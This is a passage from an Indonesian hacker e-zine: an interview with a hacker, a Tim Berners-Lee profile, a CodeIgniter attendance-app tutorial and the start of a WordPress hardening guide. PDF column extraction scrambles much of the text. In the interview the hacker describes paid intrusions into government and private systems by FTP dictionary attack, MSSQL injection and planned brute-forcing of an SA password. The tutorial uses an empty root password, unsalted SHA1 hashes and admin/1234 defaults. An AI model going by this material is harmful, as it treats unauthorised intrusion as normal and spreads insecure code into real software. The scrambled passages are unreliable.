security system (menurut pengalaman ente)
d4r3d3v1l : dari smk jurusan akuntansi dulu ane orang
akuntan 7 tahunan sampe masuk ke unsoed juga d4r3d3v1l : cracker dong tinggal ngerusak doang mah
jurusan ilmu ekonomi masih ada belajar akuntansi gampang,lagian kan hacker beneran bukan tukang
emang udah seneng banget dari pertama kali nyentuh rusak dia bisa development jaringan,paham arsitektur
yg namanya komputer kalau perlu tar ampe meninggal jaringan,mengerti 7 layer mampu development sistem
komputer juga dikubur bareng di samping yang kompleks dan paham securitnya selain itu teliti
nemuin celah keamanan dari sistem/software yang
Redaksi : hacker yang menginspirasi ente siapa dibikin maupun bikinan orang lain dia bisa nemuin
sih?atau kalau di kelas musisi kan ada tuh kelemahan dari protokol-protokol nggak hanya
influence,nah d4r3d3v1l influence nya ke mana? menemukan tapi juga bisa develop sesuatu yg lebih
bagus karena ada real hacker di dunia ini maka
d4r3d3v1l : daredevil of internet linus torvald dia itu internet bisa sampai seperti sekarang bukan dari dulu
ngoding os loh. walaupun dia gak sendirian tapi tetep pada make BBS point intinya dia develop, dia
pelopornya dia sama yg pertama bkn bahasa C bisa analyze bug, dia bisa kembangkan jadi lebih
Dennis Ritchie coba klo ga ad penemu2 bahasa aman dan baik.
tingkat tinggi ampe sekarang kita koding asm semua
ngoding bahasa hex, binary tanpa bhs tingkat tinggi Redaksi : dalam merayakan kemerdekaan,harapan
dari seorang anda kepada negara ini soal internet tuh
Redaksi : kegiatan sehari harinya ngapain aja ? gimana sih?entah dari segi keamanan system
Kesibukan ? pemerintahan?? atau bandwith kita yang masih kalah
sama negara tetangga.
d4r3d3v1l : kerjaan kejebak banyak orang minta
bikinin web. Jadi ga bikin yg laen-laen terkadang juga d4r3d3v1l : ya moga2 aja kelak bisa ada orang yang
bikin software, tapi itu jarang. hebat bisa bikin internet berkembang yang seperti
bapak onno w purbo mungkin lebih dari itu yah berdoa
Redaksi : pernah gak jadi hacker bayaran?
aja deh
d4r3d3v1l : pernah sih cuma ga resmi kalau gagal ga
(REDAKSI . . . Amin . . .)
dapet duit bukan hacker namanya. lebih tepatnya
cracker hacker sama sekali ga ada aksi perusakan Redaksi : terus harapan ente untuk devilzc0de?
yang merusak adalah cracker plesetan hacker yg
muncul setelah adanya hacker d4r3d3v1l : ya moga2 aja bisa ada orang2 hebat kelak
arahnya ane harap ke arah orang sprt linus torvald
Redaksi : melalui invitation challenge atau surat minimal klo emang suka ngerusak mending pathnya
pribadi? ke arah orang2 spt george guninski,tavis ormandy tapi
klo emang murni cuma suka develop ya ane harap
d4r3d3v1l : dari temen biasa klienya janji ketemu
arahnya ke linus torvald. moga-moga aja kelak ada
Redaksi : penyerangan ke sistem pemerintahan atau orang2 yang punya banyak waktu yang mau rajin
swasta?? belajar tentang jaringan, misal apa itu 7 layer os, rajin
belajar tentang kernel ya minimal bisa ngompile kernel
Pernah gov pernah swasta tapi susah-susah lagian dah, rajin belajar pemrograman, bangun sistem,
waktunya juga selalu terbatas jd ribet waktu itu kan IIS daemon, dll, minimal suka nyari bug2 dari sistem
kebetulan ada jaringan 1 subnet itu 1 web 1 subnet kompleks
dah ane liat dia koneksi databasenya bisa klo 1
subnet tapi ga bs dari luar Redaksi : salut nih,cita-citanya tinggi *twothumbs*

Redaksi : tekniknya ?? Redaksi : ok terakhir, pertanyaan aneh, ente ganteng


gk?
d4r3d3v1l : pake macem-teknik, ada ftp dict, mssql
injection tapi gagal terakhir masuk dari yg 1 subnet Ganteng, imut-imut (yg jawab Mutiara :D)
rencana mo ngebrute password SA dari server laen
Redaksi : ok bro, makasih banyak waktunya ;))

Devilc0de INDONESIA “To Unite and Develop” 27


“Independence C0DES, DC Backs to Holy”

Devilz Profile ke skala makrokopisnya akan menghasilkan satu


ruang informasi dengan properti-properti yang kita
TIM BERNERS LEE suka.

Dengan bermodal televisi bekas dan processor M6800


Lee ketika Mudanya menciptakan komputer
Siapa tidak mengenal INTERNET hari ini? pertamanya sampai akhirnya bekerja di Plessey
Telecommunication Ltd selepas kuliahnya, dimana
Berapa lama kalian menghabiskan waktu dengan misi utamanya saat itu adalah eksekusi sistem
internet dalam satu hari? Seberapa seringkah kalian transaksi terdistribusi, relay pesan, dan teknologi
mengakses website dan tahukan kalian siapa yang barcode.
menciptakan web itu?
Karir Sang Hacker Pencipta Web ini berlanjut ke D.G.
Si Hacker Pendiam ini adalah Tim Berners Lee Nash Ltd dimana ia membuat software typesetting
dengan kaya termasyurnya “Weaving the Web.” untuk printer dan sistem operasi multitasking. Hingga
Sosoknya tidak menyukai popularitas dan sangat kemudian mendaratkan karirnya sebagai konsultan
jarang memberikan pernyataan publik. Pribadi yang software di CERN yang saat ini menjadi “The
sangat pendiam dan pemalu ini memiliki gaya bicara European Particle Physic Laboratory.”
yang lembut dan selalu menolak untuk menjawab
pertanyaan-pertanyaan seputar kehidupan pribadinya. Tim memiliki ide yang berangkat dari pemahamnnya
tentang besar dan kompleksnya perusahaan dimana ia
Terlahir dari pasangan Pecinta komputer, Conway bekerja. Selain berlokasi di pegunungan yang dekat
Berners Lee dan Marry, 8 juni 1955 di, London sang dengan perbatasan Perancis tidak jauh dari Jenewa
penemu web ini memperoleh penghargaan sebagai Swiss. Sifatnya yang tekun jelas membuahkan hasil
‘Ksatria’ oleh Kerajaan Inggris. sebuah program komputer yang dapat bekerja seperti
otak manusia, membuat semua link yang penting antar
“The Knight Commander of the Order of file yang berbeda yang tersimpan dikomputernya.
British Empire” Sebuah sistem hypertext “Enquire’ yang tidak pernah
dipublikasikan. Enquire inilah yang menjadi cikal bakal
Masa kecilnya dihabiskan Tim dengan menikmati
diciptakannya www.
matematika sebagai kehidupan sehari-hari dengan
memainkan nomor-nomor imajiner. Dari hobi bermain HTML adalah sistem pengkodean yang relatif
angka inilah, ia menciptakan komputer mainannya dari sederhana, diciptakan Tim untuk memungkinkan teks
kardus semasa kecil. muncul dihalaman web dan menambahkan gambar-
gambar. Dari sini ia kemudian merancang sistem
“Otak manusia mempunyai keunggulan yang
alamat web dan kode yang memungkinkan dokumen-
unik melebihi komputer, sebab otak manusia
dokumen di hubungkan dari satu komputer ke
dapat menghubungkan konsep-konsep yang
komputer lain. Ia kemudian mengembangkan Next
sebelumnya terpisah-pisah.” (Tim B. Lee)
Step sebagai browser pertama yang aksi pertamanya
adalah memajang buku telepon CERN di situs web.

Studi Lee berawal dari Fisika Teoritis di Oxford Kehidupan pribadinya berawal dari satu pernikahan
University dimana kala itu ia memahami fisika sebagai dengan seorang wanita yang juga seorang
ılmu yang mengkrompromikan antara matematika dan programmer Jane North C sampai setelah bercerainya
elektronika, antara teori dan praktek sampai akhirnya mereka, Lee menikah kembali dengan Nancy yang
merubah pemahamannya dikemudian hari. Bagi Lee juga masih seorang ahli komputer di WHO.
fisika itu menyenangkan dan merupakan dasar yang
Dalam usahanya memperoleh inspirasi, si jenius ini
fundamental untuk menciptakan sebuah sistem global.
suka memandang langit, menenangkan diri dibawah
Menurutnya di Fisika manusia belajar memikirkan
pepohonan teduh yang jauh dari keramaian.
beberapa aturan matematika sederhana pada skala
mikroskopis yang ketika diskalakan akan menjelaskan
sifat makrokopisnya.
Sumber: Kisah2 Hacker Legendaris, disarikan oleh tim
Menurut Lee di internet kita mencoba menggagas Redaksi.
protokol-protokol komputer yang ketika diperhitungkan

Devilc0de INDONESIA “To Unite and Develop” 28


“Independence C0DES, DC Backs to Holy”

Pembuatan Sistem informasi Pengolahan data Absensi menggunakan PHP Framework


Codeigniter v 2.0.2 HTML5 CSS3 dan Jquery

Tema : Programming
Author : Wenkhairu

Basis data dari system sedikiti saya


Sebelumnya saya mohon maaf, ini project rubah (sederhanakan) mengingat ini
udah lama vacum gara – gara kesibukan di project pertama dan basic, nanti untuk
dunianyata, sebelum kita melanjutkan tahapan development selajutnya kita bisa
tahapan berikutnya, yang belum mengerti menambahkan apa yang perlu ditambahkan
tahap awal dan pengertian dasar dari agar terkesan lebih professional.
Codeigniter agar di tahapan ini tidak
mengambang (bingung) harus mulai dari Project ini kita bangun menggunakan PHP
mana” Framework Codeigniter versi 2.0.2 (yang
belum punya silahkan download), HTML5,
Di tahapan sebelumnya kita sudah CSS3 dan Jquery sebagai pelengkap.
mengenal bagaimana Codeigniter bekerja,
apa saja yang harus dibutuhkan, dan apa untuk User interface kita agar lebih
saja yang harus di lakukan sebelu kita user Friendly, untuk itu saya harap
melakukan development sebuah aplikasi teman-teman semua sudah memahami sedikit
berbasis Framework codeigniter, di banyak tentang peralatan perang kita, ya
tahapan ini kita akan mencoba membahas itung- itung sekali dayung dua tiga
modul per-modul (tahap per-tahap) pulau terlewati :) oke mari kita
bagaiaman membangun Project kita, lanjtukan Download dan Install Download
seperti tahapan sebelumnya, kita sudah codeigniter framework kemudian isntall
membahasa analisis (untuk instalasi CI bisa di lihat di
thread sebelumnya) yang perlu di
system, flow diagram dari system dan perhatikan adalah requirment dari CI itu
basis data dari system, untuk catatan. sendiri, seperti XAMPP server dan yang
lainnya, di thread sebelumnya kita sudah

Devilc0de INDONESIA “To Unite and Develop” 29


“Independence C0DES, DC Backs to Holy”

membahas apa saja keperluan – keperluan Pada intinya di file config.php kita
yang harus kita sediakan, setelah harus merubah baris berikut
instalasi selesai renema folder Ci
menjadi absen kemudian buka di browser $config['base_url'] =
dengan alamat http://localhost/absen 'http://localhost/mywork/absen/';
jika tulisan welcome terlihat,maka
$config['encryption_key'] =
instalasi sudah benar.
'devilzc0de_is_rock';

$config['global_xss_filtering'] = TRUE;
Setelah instalasi selesai tahapan
selajutnya adalah mengatur konfigurasi –
konfigurasi untuk kebutuhan kita, That’s it, sampai disini kita sudah
konfigurasi CI berada di folder beres melakukan konfigurasi terhadap
application/config file config.php

Konfigurasi config.php Konfigurasi autoload.php


Buka file config.php yang ada di File ini berada di
application/config/config.php dan application/config/autoload.php , disini
tentukan url_base() dari aplikasi kita, kita akan mengatur library, helper apa
url_base() adalah alamat letak dari
aplikasi kita seperti saja yang akan kita load secara
otomatis, agar dalam melakukan koding
http://localhost/absen atau kita tidak harus
http://127.0.0.1/absen konfigurasinya
seperti berikut : memanggil library dan helper tersebut
secara berulang – ulang

$config['base_url'] =
'http://localhost/mywork/absen/'; $autoload['libraries'] =
array('database','table','session','form
_validation','pagination');
Karena dalam aplikasi ini kita $autoload['helper'] =
menggunakan session maka kita harus array('url','form');
mengatur 'encryption_key'

Konfigurasi routes.php
() dari aplikasi
$config['encryption_key'] = File ini berada di
'devilzc0de_is_rock'; application/config/route.php, disini
kita akan mengatur controller mana saja
yang akan kita panggil saat pertama kali
aplikasi di jalankan, atau untuk
Dan untuk memudahkan kita dalam proteksi
mengatur perubahan pemanggilan nama
aplikasi, kita bisa mengaktifkan fitur
controller dengan alias tertentu agar
XSS_SECURE,
lebih SEO (katanya sih gitu).
dengan begitu kita tidak perlu khawatir
$route['default_controller'] = "absen";
lagi akan serangan berbentuk XSS
Dengan begitu, berarti controller yang
pertama kali di jalankan adalah
$config['global_xss_filtering'] = TRUE; controller dengan nama “absen”

Devilc0de INDONESIA “To Unite and Develop” 30


“Independence C0DES, DC Backs to Holy”

Konfigurasi database.php `id_semester` int(2) NOT NULL


AUTO_INCREMENT,
File ini berada sama dengan dengan file
– file konfigurasi sebelumnya, yaitu di `semester` varchar(10) NOT NULL,
application/config/database.php, pada
file inilah kita akan mengkonfigurasikan PRIMARY KEY (`id_semester`)
nama database, user database, dan jenis
) ENGINE=MyISAM DEFAULT CHARSET=latin1
dari database yang kita gunakan, karena
AUTO_INCREMENT=1 ;
kita bekerja dengan mysql database maka
jenis dari database tidak perlu kita CREATE TABLE IF NOT EXISTS `dev_siswa` (
rubah, kita hanya perlu menentukan
username, password dan nama database `nis` int(10) NOT NULL,
kita (disesuiakan dengan punya masing2)
`nama` varchar(30) NOT NULL,

`alamat` varchar(50) NOT NULL,


$db['default']['hostname'] =
'localhost'; `ttl` varchar(30) NOT NULL,

$db['default']['username'] = 'root'; `id_kelas` int(2) NOT NULL,

$db['default']['password'] = ''; PRIMARY KEY (`nis`)

$db['default']['database'] = ) ENGINE=MyISAM DEFAULT CHARSET=latin1;


'dev_absen';
CREATE TABLE IF NOT EXISTS `dev_user` (

`id_user` int(1) NOT NULL


Konfigurasi database bertujuan untuk AUTO_INCREMENT,
menghubungkan kita pada mesin database,
`nama_petugas` varchar(30) NOT NULL,
dengan begitu kita bisa melakukan
aktivitas CRUD untuk kebutuhan aplikasi. `username` varchar(10) NOT NULL,
Instalasi basis data Di tahap sebelumnya
kita sudah merencakan basis data dari `password` varchar(40) NOT NULL,
aplikasi kita, sekarang mari kita
implementasikan, buat dabatase baru PRIMARY KEY (`id_user`)
dengan nama dev_absen (sesuaikan dengan
konfigurasi yang ada di file ) ENGINE=MyISAM
database.php) kemudian restore sql
DEFAULT CHARSET=latin1 AUTO_INCREMENT=3
berikut:
;

INSERT INTO `dev_user` (`id_user`,


CREATE TABLE IF NOT EXISTS `dev_kelas` ( `nama_petugas`, `username`, `password`)
VALUES
`id_kelas` int(2) NOT NULL
AUTO_INCREMENT, (2, 'Brapit Inpisible', 'admin',
'd033e22ae348aeb5660fc2140aec35850c4da99
`kelas` varchar(10) NOT NULL, 7');

UNIQUE KEY `id_kelas` (`id_kelas`) Setalah resotore berhasil, maka tabel-


tabel itulah yang akan kita gunakan
) ENGINE=MyISAM DEFAULT CHARSET=latin1 sebagai tempat(storage) untuk menyimpan
AUTO_INCREMENT=1 ; dan memanipulasi rekap absensi, sampai
disini selesailah tugas kita untuk
CREATE TABLE IF NOT EXISTS konfigurasi dan instalasi, kini saatnya
`dev_semester` ( kita berkoding dan berlogika, untuk itu

Devilc0de INDONESIA “To Unite and Develop” 31


“Independence C0DES, DC Backs to Holy”

siapkan peralatan seperti rokok, cemilan $data['title'] = 'Sistem Informasi


dan handuk basah penutup kepala (sapa Pengolahan Data Absensi Siswa';
tau ada yang pusing), tahapan kita
selajutnya adalah membuat kode – kode Kode tersebut mengindikasikan bahwa
untuk model, view dan controller untuk variable tersebut akan kita jadikan
aplikasi kita, let’s rock buddy :)Jika title dari halaman yang akan di panggil
teman-teman mengikuti langkah – langkah
if(!$this->session-
berikut dan sudah memahami (membaca)
>userdata('devilzc0de')):
pengertian sebelumnya mudah-mudahan
tidak pusing, pertama kita harus membuat
sebuah controller utama, pada route.php
kita telah mendifinisikan nama kode ini akan memeriksa apakah user/
controller yang akan kita panggil dengan petugas sudah login atau belum, jika
nama “absen”, buatlah sebuah file di belum login maka tampilkan halaman login
folder application/controllers/ dengan dan jika sudah login tampilkan halaman
nama absen.php dan ketikan script utama dari aplikasi, yang perlu di
berikut: perhatikan adalah variable
$data['kontent'] = 'login';

variable tersebut menunjukan kita akan


<?php memanggil file yang mana. Disisi view
kita menggunakan templating sederhana,
class Absen extends CI_Controller {
yang jika kita panggil akan otomatis
public function index() memanggil file yang lainnya, untuk itu
buatlah file dengan nama header.php,
{ footer.php dan template.php di folder
application/views kemudian buka file
$data['title'] = 'Sistem Informasi header.php dan ketikan script berikut:
Pengolahan Data Absensi Siswa';

if(!$this->session-
>userdata('devilzc0de')): <!DOCTYPE html>

$data['kontent'] = 'login'; <html lang="en">

$this->load->view('template', $data); <head>

else: <meta charset="utf-8"/>

$data['kontent'] = 'absen'; <title><?=$title;?></title>

$this->load->view('template', $data); <link rel='stylesheet' type='text/css'


href='<?=base_url();?>asset/css/style.cs
endif; s' />

} <script type="text/javascript"
src="<?=base_url();?>asset/js/jquery.too
}
ls.min.js"></script>
?>
<script type="text/javascript"
src="<?=base_url();?>asset/js/cufon-
yui.js"></script>
Ingat,nama controller harus di mulai
dengan huruf kapital, pada script di <script
atas terdapat variable $data[] dalam
type="text/javascript"></script>
bentuk larik (array) yang akan kita
tampilkan di halaman

Devilc0de INDONESIA “To Unite and Develop” 32


“Independence C0DES, DC Backs to Holy”

src="<?=base_url();?>asset/js/Amazone_BT <li><?=anchor('rekap','Rekap
_italic_400.font.js" Absensi');?></li>

<script <li><?=anchor('login/user','Ganti
src="<?=base_url();?>asset/js/Qlassik_TB Password');?></li>
-cufon.js"
type="text/javascript"></script> <li><?=anchor('login/logout','Logout');?
></li>
<script type="text/javascript">
</ul>
$(function(){
</div>
Cufon.replace('#header h1', {
fontFamily: 'Amazone BT' }); <?php endif?>

Cufon.replace('#kontent h1, p, h2, a, <div id="main_content">


#footer', { hover: true }, { fontFamily:
'Qlassik
Jika kita perhatikan secara seksama
Medium' });
<title><?=$title;?></title> terlihat ada
$("#menu a[title]").tooltip(); varible dengan nama $title, variable ini
berasal dari controller kita seblumnya
}); $data[‘title’] kemudian terdapat

</script> <?=base_url();?>

</head> ini menunjukan kita mengguanakan letak


alamat dari aplikasi kita yang telah
<body> kita atur di file config.php sebelumnya,
di folder root aplikasi kita kita juga
<div id="container">
harus menyiapkan folder dengan asset di
<div id="header"><h1>Sistem Informasi folder inilah kita menyimpan file file
Absensi</h1></div> tambahan kita, dalam folder asset
terdapat 3 folder utama, ini dimaksudkan
<?php if($this->session- agar file-file tersusun dengan rapi,
>userdata('devilzc0de')):?> seperti folder css, images, dan js, saya
rasa saya tidak perlu menjelaskan fungsi
<div id="navigasi"> dari folder-folder tersebut. Kemudian
pada file footer.php ketikan script
<h2>&raquo; Menu Utama</h1>
berikut:
<ul>
</div>
<li><?=anchor('absen','Beranda');?></li>
<div id="footer">
<li><?=anchor('absensi','Absensi
&copy; <?=date('Y');?> &reg;Devilzc0de
Siswa');?></li>
Development
<li><?=anchor('siswa','Data
</div>
Siswa');?></li>
</div>
<li><?=anchor('semester','Data
Semester');?></li> </body>

<li><?=anchor('kelas','Data </html>
Kelas');?></li>

Devilc0de INDONESIA “To Unite and Develop” 33


“Independence C0DES, DC Backs to Holy”

Pada file template.php ketikan script <div class="form_login">


berikut:
<h2>Login Petugas</h2>
<?php $this->load->view('header');?>
<?php $msg = $this->session-
<?php $this->load->view($kontent);?> >flashdata('message');?>

<?php $this->load->view('footer');?> <?php if(!empty($msg)){echo $msg;}?>

Coba kita perhatikan dari ketiga baris <?php echo validation_errors('<div


script tersebut ada satu script yang class="error">', '</div>'); ?>
berbeda, yap script yang di tengah,
terlihat jika script tersebut memiliki <?=form_open('login/auth','id="loginform
variable dengan nama $kontent, mungkin "');?>
teman-teman bertanya, kok bisa ? nah
<p><label>Username</label><inputtype="te
inilah yang dimaksudkan dengan
xt"set_value('username');?>"
templating, isi dari variable tersebut
required="required"/></p>
akan kita kirimkan melalui controller
dengan nama $data[‘kontent’] dengan <p><label>Password</label><input
begitu isi dari variable $kontent akan
bisa kita rubah sesuai dengan halaman type="password"
yang kita panggil dan tentu saja file
header.php dan footer.php tidak perlu set_value('password');?>"
kita panggil berulang-ulang, cukup required="required"/></p>
dengan memanggil view dari file
name="username"
template.php file header.php dan
footer.php sudah termasuk di value="<?php
dalamnya.Sekarang coba perhatikan
kembali file controller absen.php yang name="password"
ada di folder
application/controllers/absen.php pada value="<?php
fungsi index terdapat pengecekan session
apakah user telah login atau belum, jika echo
user tidak dalam keadaan login.
echo
Maka tampilkan halaman login dan jika
<p><input type="submit" name="login"
user sudah login maka tampilkan halaman
value="Login" class="button blue"/></p>
utama, untuk itu kita harus membuat
sebuah file baru yang namanya sesuai <?=form_close();?>
dengan nama yang kita difinisikan di
controller, pada controller jika user </div>
tidak dalam keadaan login kita memanggil
view dengan nama login

$data[‘kontent’] = ‘login’; dan Cukup simple kan halaman login, kita


memanggil view melalui $this->load- menggunakan helper form dan library
>view(‘template’,$data); form_validation yang sudah kita atur di
dalam folder autoload.php sebelumnya.
ini berarti kita memanggil halaman
login, karena variable $kontent bernilai <?php $msg = $this->session-
login, untuk itu mari kita buat sebuah >flashdata('message');?>
file dengan nama login.php di
<?php if(!empty($msg)){echo $msg;}?>
application/views kemudian ketikan
script berikut: Akan menampilkan pesan jika terjadi
kesalahan dalam login, pesan tersebut

Devilc0de INDONESIA “To Unite and Develop” 34


“Independence C0DES, DC Backs to Holy”

kita atur di dalam controller, kemudian buat sebuah file dengan nama login.php
script di folder application/controller/ kedua
file ini akan saling berinterakasi,
<?=form_open('login/auth','id="loginform controller login akan mengahandle setiap
"');?> control untuk keperluan login,sedangkan
user_model.php akan handle semua urusan
Kita membuat sebuah form dengan action
yang berhubungan dengan database query,
yang menuju controller dengan nama login
pada file user_model.php ketikan script
dan function auth dan form ditutup
berikut:
dengan script :
<?php if ( ! defined('BASEPATH'))
<?=form_close();?>
exit('No direct script access allowed');
Untuk validasi form selain menggunakan
class User_model extends CI_Model
server side validation (validasi dari
sisi server) kita juga menggunakan {
fasilitas dari HTML5 sebagai client side
validation(validasi dari sisi client), function __construct()
ini dimaksudkan agar browser yang tidak
mendukung teknologi HTML5 kita tapi {
dapat melakukan validasi dari sisi
parent::__construct();
server(server side validation), untuk
style tidak usah di pikirkan, diakhir }
segmen kita akan membahasnya. Sekarang
coba jalankan aplikasi kita dengan function login()
mengaskes alamat
{
http://localhost/absen maka hasilnya
seperti berikut $this->db->where('username',$this-
>input->post('username'));

$this->db->where('password',sha1($this-
>input->post('password')));

$query = $this->db->get('dev_user');

if($query->num_rows == 1){

return $query->result();

tentu saja sebelum kita membuat sebuah ?>


controller dengan nama login kita tidak
bisa login, untuk itu kita membutuhkan
sebuah controller dengan nama login dan Dan pada file controller login.php
sebuah fungsi dengan nama auth dan ketikan script berikut:
sebuah model untuk mengurusi query dari
aksi login yang melakukan pengecekan <?php if ( ! defined('BASEPATH'))
terhadap basis data, exit('No direct script access allowed');

buatlah sebuah model di folder class Login extends CI_Controller


application/models/ dengan nama
user_model.php kemudian {

Devilc0de INDONESIA “To Unite and Develop” 35


“Independence C0DES, DC Backs to Holy”

function __construct() }else{

{ $this->session-
>set_flashdata('message','<p
parent::__construct(); class="error">Mohon

$this->load->model('user_model'); maaf, Username dan Password tidak


valid</p>');
}
redirect('absen','refresh');
function auth()
}
{
}
$this->form_validation-
>set_rules('username', 'Username', }

'trim|required|htmlspecialchars'); function logout()

$this->form_validation- {
>set_rules('password', 'Password',
'trim|required'); $this->session->sess_destroy();

if ($this->form_validation->run() == redirect('absen','refresh');
FALSE)
}
{
}
$data['title'] = 'Sistem Informasi
Pengolahan Data Absensi Siswa'; ?>

$data['kontent'] = 'login';

$this->load->view('template', $data); Pada file user_model.php terdapat sebuah


fugsi dengan nama login, fungsi ini
}else{ bertugas untuk melakukan pemeriksaan
terhadap database ada atau tidak user
$login = $this->user_model->login(); yang bersangkutan:

if($login){ function login()

foreach($login as $data): {

$sessi = array( $this->db->where('username',$this-


>input->post('username'));
'level'=>'admin',
$this->db->where('password',sha1($this-
'username'=>$data->username,
>input->post('password')));
'nama'=>$data->nama_petugas,
$query = $this->db->get('dev_user');
'devilzc0de'=>true
if($query->num_rows == 1){
);
return $query->result();
endforeach;
}
$this->session->set_userdata($sessi);
}
redirect('absen','refresh');
jika user ditemukan maka kembalikan
nilainya (hasil query) jika tidak maka

Devilc0de INDONESIA “To Unite and Develop” 36


“Independence C0DES, DC Backs to Holy”

nilainya akan menjadi false, kemudian $this->session-


pada file controller login terdapat >set_flashdata('message','<p
sebuah fungsi dengan nama auth,fungsi class="error">Mohon maaf, Username dan
inilah yang mengatur semua proses login Password tidak
yang terjadi:
valid</p>');
$this->form_validation-
>set_rules('username', 'Username', redirect('absen','refresh');
'trim|required|htmlspecialchars');

$this->form_validation-
Script tersebut berfungsi untuk
>set_rules('password', 'Password',
menamilkan pesan kesalahan jika terjadi
'trim|required');
kesalahan dalam login, username dan
password tidak ditemukan dalam database
dan membawa kita kembali pada halaman
Script tersebut digunakan untuk validasi login.
dari sisi server dengan option trim,
required yang artinya tidak boleh function logout()
kosong, dan menghilangkan semua tag html

if ($this->form_validation->run() ==
FALSE)

$data['title'] = 'Sistem Informasi


Pengolahan Data Absensi Siswa';

$data['kontent'] = 'login';

$this->load->view('template', $data);

jika validasi yang ditentukan masih {


bernilai false, atau ketentuan validasi
$this->session->sess_destroy();
yang kita berikan masih belum terpenuhi
maka kita akan di bawa kembali menuju redirect('absen','refresh');
form login dan menampilkan pesan
kesalahan }

Script tersebut berguna untuk fungsi


logout, jika logout berhasil kita akan
di bawa kembali kehalaman depan

$login = $this->user_model->login();

if($login){

foreach($login as $data):

$sessi = array(

Devilc0de INDONESIA “To Unite and Develop” 37


“Independence C0DES, DC Backs to Holy”

'level'=>'admin',

'username'=>$data->username,

'nama'=>$data->nama_petugas,

'devilzc0de'=>true

);

endforeach;

$this->session->set_userdata($sessi);

redirect('absen','refresh');

} Sampai disini, selesailah tahap pertama


kita, kita hanya tinggal memperbaiki
stylenya saja, agar terlihat labih
Dan jika login berhasil maka script di menarik, berikut script style untuk
ataslah yang berfungsi membawa kita modul pertama kita, buat sebuah file
kehalaman utama absen, dan menciptakan dengan nama style.css dan simpan dalam
sebuah session dengan bentuk array yang folder asset/css/ dan jangan lupa untuk
nantinya bisa kita gunakan untuk mendownload file Jquery.js dan letakan
keperluan lain dalam aplikasi. dalam folder asset/js/ untuk style
tambahan kita meggunakan plugin
Jika kita kembali lagi ke controller
absen di atas, kita akan mendapati Jquery yang bernama cufon.js teman –
kondisi dimana user sudah dalam keadaan teman bisa mendownloadnya dan memilih
login, dan halaman yang di load adalah font mana yang teman-teman sukai
halaman (menurut selera saja).

absen $data[‘kontent’] = ‘absen’; $this- Dan letakan dalam folder asset/js/ dalam
>load->view(‘template’ , $data); aplikasi kita bisa melihatnya pada file
header.php di folder
untuk itu kita membutuhkan satu buah application/views/header.php
file dengan nama absen.php yang letaknya
dalam folder views, buat sebuah file <link rel='stylesheet' type='text/css'
dengan nama absen.php di folder href='<?=base_url();?>asset/css/style.cs
application/views/ kemudian ketikan s' />
script berikut:
<script type="text/javascript"
<h1>Selamat Datang <?=$this->session- src="<?=base_url();?>asset/js/jquery.too
>userdata('nama');?></h1> ls.min.js"></script>

Kemudian login kembali dengan user yang <script type="text/javascript"


benar dan password yang benar, src="<?=base_url();?>asset/js/cufon-
yui.js"></script>
User:admin dan password:1234
<script
src="<?=base_url();?>asset/js/Amazone_BT
_italic_400.font.js"
Maka hasilnya akan seperti berikut:
type="text/javascript"></script>

<script
src="<?=base_url();?>asset/js/Qlassik_TB

Devilc0de INDONESIA “To Unite and Develop” 38


“Independence C0DES, DC Backs to Holy”

-cufon.js"
type="text/javascript"></script>

<script type="text/javascript">

$(function(){

Cufon.replace('#header h1', {
fontFamily: 'Amazone BT' });

Cufon.replace('#kontent h1, p, h2, a,


#footer', { fontFamily: 'Qlassik Medium'
});

$("#menu a[title]").tooltip();

});

</script>
Tampilan halaman Utama setelah Login
behasil

Berikut tampilan aplikasi setelah kita


berikan CSS dan sedikit sentuhan indah
dari Jquery dan CSS 3

Thanks to:

Whitehat, petimati, cakil_schumbang,


chaer_newbe, xtr0nic, shamus, mywisdom,
wahyu_devilzc0de, Patriot, ketek dan
nofia_fitri, _gunslinger, mavia_h4x0r,
blu3kids.

devilzc0de.org whitecyber.net,
Tampilan jika terjadi kesalahan dalam jasakom.com, anti jasakom.com and you.
proses Login
Special for => My Parent: Ibunda &
Ayahanda

*REDAKSI: script style.css terdapat pada


blog Devilz Magazine.

Devilc0de INDONESIA “To Unite and Develop” 39


“Independence C0DES, DC Backs to Holy”

DASAR-DASAR KEAMANAN DI order allow,deny


deny from all
WORDPRESS </files>

Oleh: Tempe.Mendoan
2. Secret Key file wp-config.php

Assalamu’alaikum Wr.Wb WordPress saat ini sudah menggunakan


8 Secret Keys, Secret Key dibuat untuk
Di sini saya ingin sekedar berbagi melindungi situs/blog berbasis WordPress
tentang dasar-dasar keamanan web yang dan lebih menjamin informasi yang
menggunakan wordpress, mungkin bagi tersimpan pada cookies akan terenskripsi
teman-teman yang sudah tahu tutorial dengan lebih baik, cara meningkatkan
dari saya mungkin terlihat cupu maklum keamanan wordpress yaitu dengan
saya juga masih belajar. Karena mungkin memasukkan Secret Key pada file wp-
tulisan ini masih banyak kekurangan dan config.php
mungkin masih banyak cara untuk
mengamankan web yang menggunakan Contoh dari Secret Keys anda biasa
WordPress dan mungkin juga ini hanya mengunjungi:
dasar dari mengamankan wordpress tapi
https://api.wordpress.org/secret-
mudah-mudahan bermanfaat.
key/1.1/salt/
Yow is lanjut wae yo dari pada basa-basi
Anda bisa mengganti Secret Keys yang ada
takut bosen baca nya.
di file wp-config.php dengan Secret Keys
DAFTAR ISI yang ada di URL.

1. Protect File wp-config.php


2. Secret Key file wp-config.php
3. Limit access directory wp-admin 3. Limit access directory wp-admin
4. Menghilangkan pesan error
5. Privat Login
6. Plugins Security Di direktori wp-admin di sini saya masih
7. Mengganti Akun Admin menerangkan tentang .htaccess, buatlah
8. Backup dan Restore database Wordpress .htaccess di folder wp-admin dengan kode
9. Memilih tempat Hosting
berikut :
10. Penutup
AuthUserFile /dev/null
AuthGroupFile /dev/null
1. Protect File wp-config.php
AuthName "Access Control"
AuthType Basic
File wp-config.php berisi informasi yang
order deny,allow
sangat sensitif tentang instalasi
deny from all
WordPress , termasuk akses database,
# IP address anda
prefix tabel dan Tombol Rahasia.
allow from xx.xxx.xxx.xx
File wp-config.php adalah bagian standar
dari instalasi WordPress Anda. Ini
mendefinisikan pengaturan konfigurasi
Ganti xx.xxx.xxx.xx di atas ↑ deng an
yang diperlukan untuk mengakses database
MySQL. alamat IP anda (beberapa IP address juga
bisa ditambahkan).
Bagaimana melindungi WordPress wp-
config.php :

Buat file.htaccess di direktori 4. Menghilangkan pesan error


wordpress, dan isi file .htaccess
tersebut dengan kode di bawah ini : Maksud dari Menghilangkan pesan error
adalah pesan error di file wordpress, di
# protect wpconfig.php sini saya mengambil contoh file di wp-
<files wp-config.php> settings.php karena masih banyak web

Devilc0de INDONESIA “To Unite and Develop” 40


